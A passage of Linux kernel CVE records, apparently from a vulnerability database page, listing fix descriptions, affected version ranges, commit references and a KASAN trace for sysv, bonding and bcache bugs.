              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "2.6.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nsysv: don\u0027t call sb_bread() with pointers_lock held\n\nsyzbot is reporting sleep in atomic context in SysV filesystem [1], for\nsb_bread() is called with rw_spinlock held.\n\nA \"write_lock(\u0026pointers_lock) =\u003e read_lock(\u0026pointers_lock) deadlock\" bug\nand a \"sb_bread() with write_lock(\u0026pointers_lock)\" bug were introduced by\n\"Replace BKL for chain locking with sysvfs-private rwlock\" in Linux 2.5.12.\n\nThen, \"[PATCH] err1-40: sysvfs locking fix\" in Linux 2.6.8 fixed the\nformer bug by moving pointers_lock lock to the callers, but instead\nintroduced a \"sb_bread() with read_lock(\u0026pointers_lock)\" bug (which made\nthis problem easier to hit).\n\nAl Viro suggested that why not to do like get_branch()/get_block()/\nfind_shared() in Minix filesystem does. And doing like that is almost a\nrevert of \"[PATCH] err1-40: sysvfs locking fix\" except that get_branch()\n from with find_shared() is called without write_lock(\u0026pointers_lock)."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:16:59.545Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/13b33feb2ebddc2b1aa607f553566b18a4af1d76"
        },
        {
          "url": "https://git.kernel.org/stable/c/1b4fe801b5bedec2b622ddb18e5c9bf26c63d79f"
        },
        {
          "url": "https://git.kernel.org/stable/c/674c1c4229e743070e09db63a23442950ff000d1"
        },
        {
          "url": "https://git.kernel.org/stable/c/fd203d2c671bdee9ab77090ff394d3b71b627927"
        },
        {
          "url": "https://git.kernel.org/stable/c/53cb1e52c9db618c08335984d1ca80db220ccf09"
        },
        {
          "url": "https://git.kernel.org/stable/c/89e8524135a3902e7563a5a59b7b5ec1bf4904ac"
        },
        {
          "url": "https://git.kernel.org/stable/c/a69224223746ab96d43e5db9d22d136827b7e2d3"
        },
        {
          "url": "https://git.kernel.org/stable/c/f123dc86388cb669c3d6322702dc441abc35c31e"
        }
      ],
      "title": "sysv: don\u0027t call sb_bread() with pointers_lock held",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2023-52699",
    "datePublished": "2024-05-19T10:10:30.381Z",
    "dateReserved": "2024-03-07T14:49:46.890Z",
    "dateUpdated": "2026-01-05T10:16:59.545Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39487 (GCVE-0-2024-39487)

Vulnerability from cvelistv5 – Published: 2024-07-09 09:52 – Updated: 2025-11-03 21:56

Title

bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set()

Summary

In the Linux kernel, the following vulnerability has been resolved: bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set() In function bond_option_arp_ip_targets_set(), if newval->string is an empty string, newval->string+1 will point to the byte after the string, causing an out-of-bound read. BUG: KASAN: slab-out-of-bounds in strlen+0x7d/0xa0 lib/string.c:418 Read of size 1 at addr ffff8881119c4781 by task syz-executor665/8107 CPU: 1 PID: 8107 Comm: syz-executor665 Not tainted 6.7.0-rc7 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014 Call Trace: <TASK> __dump_stack lib/dump_stack.c:88 [inline] dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106 print_address_description mm/kasan/report.c:364 [inline] print_report+0xc1/0x5e0 mm/kasan/report.c:475 kasan_report+0xbe/0xf0 mm/kasan/report.c:588 strlen+0x7d/0xa0 lib/string.c:418 __fortify_strlen include/linux/fortify-string.h:210 [inline] in4_pton+0xa3/0x3f0 net/core/utils.c:130 bond_option_arp_ip_targets_set+0xc2/0x910 drivers/net/bonding/bond_options.c:1201 __bond_opt_set+0x2a4/0x1030 drivers/net/bonding/bond_options.c:767 __bond_opt_set_notify+0x48/0x150 drivers/net/bonding/bond_options.c:792 bond_opt_tryset_rtnl+0xda/0x160 drivers/net/bonding/bond_options.c:817 bonding_sysfs_store_option+0xa1/0x120 drivers/net/bonding/bond_sysfs.c:156 dev_attr_store+0x54/0x80 drivers/base/core.c:2366 sysfs_kf_write+0x114/0x170 fs/sysfs/file.c:136 kernfs_fop_write_iter+0x337/0x500 fs/kernfs/file.c:334 call_write_iter include/linux/fs.h:2020 [inline] new_sync_write fs/read_write.c:491 [inline] vfs_write+0x96a/0xd80 fs/read_write.c:584 ksys_write+0x122/0x250 fs/read_write.c:637 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x40/0x110 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b ---[ end trace ]--- Fix it by adding a check of string length before using it.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/6a8a4fd082c439e19…
	https://git.kernel.org/stable/c/6b21346b399fd1336…
	https://git.kernel.org/stable/c/707c85ba3527ad6aa…
	https://git.kernel.org/stable/c/bfd14e5915c2669f2…
	https://git.kernel.org/stable/c/c8eb8ab9a44ff0e73…
	https://git.kernel.org/stable/c/b75e33eae8667084b…
	https://git.kernel.org/stable/c/9f835e48bd4c75fdf…
	https://git.kernel.org/stable/c/e271ff53807e8f2c6…

Impacted products

Vendor

Product

Version

Linux

Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < 6a8a4fd082c439e19fede027e80c79bc4c84bb8e (git)
Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < 6b21346b399fd1336fe59233a17eb5ce73041ee1 (git)
Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < 707c85ba3527ad6aa25552033576b0f1ff835d7b (git)
Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < bfd14e5915c2669f292a31d028e75dcd82f1e7e9 (git)
Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < c8eb8ab9a44ff0e73492d0a12a643c449f641a9f (git)
Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < b75e33eae8667084bd4a63e67657c6a5a0f8d1e8 (git)
Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < 9f835e48bd4c75fdf6a9cff3f0b806a7abde78da (git)
Affected: f9de11a165943a55e0fbda714caf60eaeb276a42 , < e271ff53807e8f2c628758290f0e499dbe51cb3d (git)

Linux

Affected: 3.13
Unaffected: 0 , < 3.13 (semver)
Unaffected: 4.19.318 , ≤ 4.19.* (semver)
Unaffected: 5.4.280 , ≤ 5.4.* (semver)
Unaffected: 5.10.222 , ≤ 5.10.* (semver)
Unaffected: 5.15.163 , ≤ 5.15.* (semver)
Unaffected: 6.1.98 , ≤ 6.1.* (semver)
Unaffected: 6.6.39 , ≤ 6.6.* (semver)
Unaffected: 6.9.9 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39487",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-23T14:04:37.191643Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-23T14:04:48.902Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T21:56:09.674Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6a8a4fd082c439e19fede027e80c79bc4c84bb8e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6b21346b399fd1336fe59233a17eb5ce73041ee1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/707c85ba3527ad6aa25552033576b0f1ff835d7b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/bfd14e5915c2669f292a31d028e75dcd82f1e7e9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c8eb8ab9a44ff0e73492d0a12a643c449f641a9f"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b75e33eae8667084bd4a63e67657c6a5a0f8d1e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9f835e48bd4c75fdf6a9cff3f0b806a7abde78da"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e271ff53807e8f2c628758290f0e499dbe51cb3d"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/bonding/bond_options.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6a8a4fd082c439e19fede027e80c79bc4c84bb8e",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            },
            {
              "lessThan": "6b21346b399fd1336fe59233a17eb5ce73041ee1",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            },
            {
              "lessThan": "707c85ba3527ad6aa25552033576b0f1ff835d7b",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            },
            {
              "lessThan": "bfd14e5915c2669f292a31d028e75dcd82f1e7e9",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            },
            {
              "lessThan": "c8eb8ab9a44ff0e73492d0a12a643c449f641a9f",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            },
            {
              "lessThan": "b75e33eae8667084bd4a63e67657c6a5a0f8d1e8",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            },
            {
              "lessThan": "9f835e48bd4c75fdf6a9cff3f0b806a7abde78da",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            },
            {
              "lessThan": "e271ff53807e8f2c628758290f0e499dbe51cb3d",
              "status": "affected",
              "version": "f9de11a165943a55e0fbda714caf60eaeb276a42",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/bonding/bond_options.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.13"
            },
            {
              "lessThan": "3.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.318",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.280",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.222",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.163",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.98",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.39",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.9",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.318",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.280",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.222",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.163",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.98",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.39",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.9",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set()\n\nIn function bond_option_arp_ip_targets_set(), if newval-\u003estring is an\nempty string, newval-\u003estring+1 will point to the byte after the\nstring, causing an out-of-bound read.\n\nBUG: KASAN: slab-out-of-bounds in strlen+0x7d/0xa0 lib/string.c:418\nRead of size 1 at addr ffff8881119c4781 by task syz-executor665/8107\nCPU: 1 PID: 8107 Comm: syz-executor665 Not tainted 6.7.0-rc7 #1\nHardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106\n print_address_description mm/kasan/report.c:364 [inline]\n print_report+0xc1/0x5e0 mm/kasan/report.c:475\n kasan_report+0xbe/0xf0 mm/kasan/report.c:588\n strlen+0x7d/0xa0 lib/string.c:418\n __fortify_strlen include/linux/fortify-string.h:210 [inline]\n in4_pton+0xa3/0x3f0 net/core/utils.c:130\n bond_option_arp_ip_targets_set+0xc2/0x910\ndrivers/net/bonding/bond_options.c:1201\n __bond_opt_set+0x2a4/0x1030 drivers/net/bonding/bond_options.c:767\n __bond_opt_set_notify+0x48/0x150 drivers/net/bonding/bond_options.c:792\n bond_opt_tryset_rtnl+0xda/0x160 drivers/net/bonding/bond_options.c:817\n bonding_sysfs_store_option+0xa1/0x120 drivers/net/bonding/bond_sysfs.c:156\n dev_attr_store+0x54/0x80 drivers/base/core.c:2366\n sysfs_kf_write+0x114/0x170 fs/sysfs/file.c:136\n kernfs_fop_write_iter+0x337/0x500 fs/kernfs/file.c:334\n call_write_iter include/linux/fs.h:2020 [inline]\n new_sync_write fs/read_write.c:491 [inline]\n vfs_write+0x96a/0xd80 fs/read_write.c:584\n ksys_write+0x122/0x250 fs/read_write.c:637\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0x40/0x110 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n---[ end trace ]---\n\nFix it by adding a check of string length before using it."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:16:50.329Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/6a8a4fd082c439e19fede027e80c79bc4c84bb8e"
        },
        {
          "url": "https://git.kernel.org/stable/c/6b21346b399fd1336fe59233a17eb5ce73041ee1"
        },
        {
          "url": "https://git.kernel.org/stable/c/707c85ba3527ad6aa25552033576b0f1ff835d7b"
        },
        {
          "url": "https://git.kernel.org/stable/c/bfd14e5915c2669f292a31d028e75dcd82f1e7e9"
        },
        {
          "url": "https://git.kernel.org/stable/c/c8eb8ab9a44ff0e73492d0a12a643c449f641a9f"
        },
        {
          "url": "https://git.kernel.org/stable/c/b75e33eae8667084bd4a63e67657c6a5a0f8d1e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/9f835e48bd4c75fdf6a9cff3f0b806a7abde78da"
        },
        {
          "url": "https://git.kernel.org/stable/c/e271ff53807e8f2c628758290f0e499dbe51cb3d"
        }
      ],
      "title": "bonding: Fix out-of-bounds read in bond_option_arp_ip_targets_set()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-39487",
    "datePublished": "2024-07-09T09:52:07.664Z",
    "dateReserved": "2024-06-25T14:23:23.747Z",
    "dateUpdated": "2025-11-03T21:56:09.674Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-39482 (GCVE-0-2024-39482)

Vulnerability from cvelistv5 – Published: 2024-07-05 06:55 – Updated: 2025-07-11 17:19

Title

bcache: fix variable length array abuse in btree_iter

Summary

In the Linux kernel, the following vulnerability has been resolved: bcache: fix variable length array abuse in btree_iter btree_iter is used in two ways: either allocated on the stack with a fixed size MAX_BSETS, or from a mempool with a dynamic size based on the specific cache set. Previously, the struct had a fixed-length array of size MAX_BSETS which was indexed out-of-bounds for the dynamically-sized iterators, which causes UBSAN to complain. This patch uses the same approach as in bcachefs's sort_iter and splits the iterator into a btree_iter with a flexible array member and a btree_iter_stack which embeds a btree_iter as well as a fixed-length data array.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2c3d7b03b658dc8bf…
	https://git.kernel.org/stable/c/5a1922adc5798b7ec…
	https://git.kernel.org/stable/c/934e1e4331859183a…
	https://git.kernel.org/stable/c/6479b9f41583b0130…
	https://git.kernel.org/stable/c/0c31344e22dd8d6b1…
	https://git.kernel.org/stable/c/3a861560ccb35f2a4…

Impacted products

Vendor

Product

Version

Linux

Affected: cafe563591446cf80bfbc2fe3bc72a2e36cf1060 , < 2c3d7b03b658dc8bfa6112b194b67b92a87e081b (git)
Affected: cafe563591446cf80bfbc2fe3bc72a2e36cf1060 , < 5a1922adc5798b7ec894cd3f197afb6f9591b023 (git)
Affected: cafe563591446cf80bfbc2fe3bc72a2e36cf1060 , < 934e1e4331859183a861f396d7dfaf33cb5afb02 (git)
Affected: cafe563591446cf80bfbc2fe3bc72a2e36cf1060 , < 6479b9f41583b013041943c4602e1ad61cec8148 (git)
Affected: cafe563591446cf80bfbc2fe3bc72a2e36cf1060 , < 0c31344e22dd8d6b1394c6e4c41d639015bdc671 (git)
Affected: cafe563591446cf80bfbc2fe3bc72a2e36cf1060 , < 3a861560ccb35f2a4f0a4b8207fa7c2a35fc7f31 (git)

Linux

Affected: 3.10
Unaffected: 0 , < 3.10 (semver)
Unaffected: 5.10.221 , ≤ 5.10.* (semver)
Unaffected: 5.15.162 , ≤ 5.15.* (semver)
Unaffected: 6.1.94 , ≤ 6.1.* (semver)
Unaffected: 6.6.34 , ≤ 6.6.* (semver)
Unaffected: 6.9.5 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-39482",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-07-08T17:54:07.988323Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-07-08T17:54:15.435Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:26:15.917Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2c3d7b03b658dc8bfa6112b194b67b92a87e081b"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5a1922adc5798b7ec894cd3f197afb6f9591b023"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/934e1e4331859183a861f396d7dfaf33cb5afb02"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/6479b9f41583b013041943c4602e1ad61cec8148"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/0c31344e22dd8d6b1394c6e4c41d639015bdc671"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3a861560ccb35f2a4f0a4b8207fa7c2a35fc7f31"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/bcache/bset.c",
            "drivers/md/bcache/bset.h",
            "drivers/md/bcache/btree.c",
            "drivers/md/bcache/super.c",
            "drivers/md/bcache/sysfs.c",
            "drivers/md/bcache/writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2c3d7b03b658dc8bfa6112b194b67b92a87e081b",
              "status": "affected",
              "version": "cafe563591446cf80bfbc2fe3bc72a2e36cf1060",
              "versionType": "git"
            },
            {
              "lessThan": "5a1922adc5798b7ec894cd3f197afb6f9591b023",
              "status": "affected",
              "version": "cafe563591446cf80bfbc2fe3bc72a2e36cf1060",
              "versionType": "git"
            },
            {
              "lessThan": "934e1e4331859183a861f396d7dfaf33cb5afb02",
              "status": "affected",
              "version": "cafe563591446cf80bfbc2fe3bc72a2e36cf1060",
              "versionType": "git"
            },
            {
              "lessThan": "6479b9f41583b013041943c4602e1ad61cec8148",
              "status": "affected",
              "version": "cafe563591446cf80bfbc2fe3bc72a2e36cf1060",
              "versionType": "git"
            },
            {
              "lessThan": "0c31344e22dd8d6b1394c6e4c41d639015bdc671",
              "status": "affected",
              "version": "cafe563591446cf80bfbc2fe3bc72a2e36cf1060",
              "versionType": "git"
            },
            {
              "lessThan": "3a861560ccb35f2a4f0a4b8207fa7c2a35fc7f31",
              "status": "affected",
              "version": "cafe563591446cf80bfbc2fe3bc72a2e36cf1060",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/md/bcache/bset.c",
            "drivers/md/bcache/bset.h",
            "drivers/md/bcache/btree.c",
            "drivers/md/bcache/super.c",
            "drivers/md/bcache/sysfs.c",
            "drivers/md/bcache/writeback.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.10"
            },
            {
              "lessThan": "3.10",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.94",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.34",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.94",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.34",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.5",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "3.10",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbcache: fix variable length array abuse in btree_iter\n\nbtree_iter is used in two ways: either allocated on the stack with a\nfixed size MAX_BSETS, or from a mempool with a dynamic size based on the\nspecific cache set. Previously, the struct had a fixed-length array of\nsize MAX_BSETS which was indexed out-of-bounds for the dynamically-sized\niterators, which causes UBSAN to complain.\n\nThis patch uses the same approach as in bcachefs\u0027s sort_iter and splits\nthe iterator into a btree_iter with a flexible array member and a\nbtree_iter_stack which embeds a btree_iter as well as a fixed-length\ndata array."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-07-11T17:19:50.338Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2c3d7b03b658dc8bfa6112b194b67b92a87e081b"
        },
        {
          "url": "https://git.kernel.org/stable/c/5a1922adc5798b7ec894cd3f197afb6f9591b023"
        },
        {
          "url": "https://git.kernel.org/stable/c/934e1e4331859183a861f396d7dfaf33cb5afb02"
        },
        {
          "url": "https://git.kernel.org/stable/c/6479b9f41583b013041943c4602e1ad61cec8148"
        },
        {
          "url": "https://git.kernel.org/stable/c/0c31344e22dd8d6b1394c6e4c41d639015bdc671"
        },
        {
          "url": "https://git.kernel.org/stable/c/3a861560ccb35f2a4f0a4b8207fa7c2a35fc7f31"
        }
      ],
      "title": "bcache: fix variable length array abuse in btree_iter",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
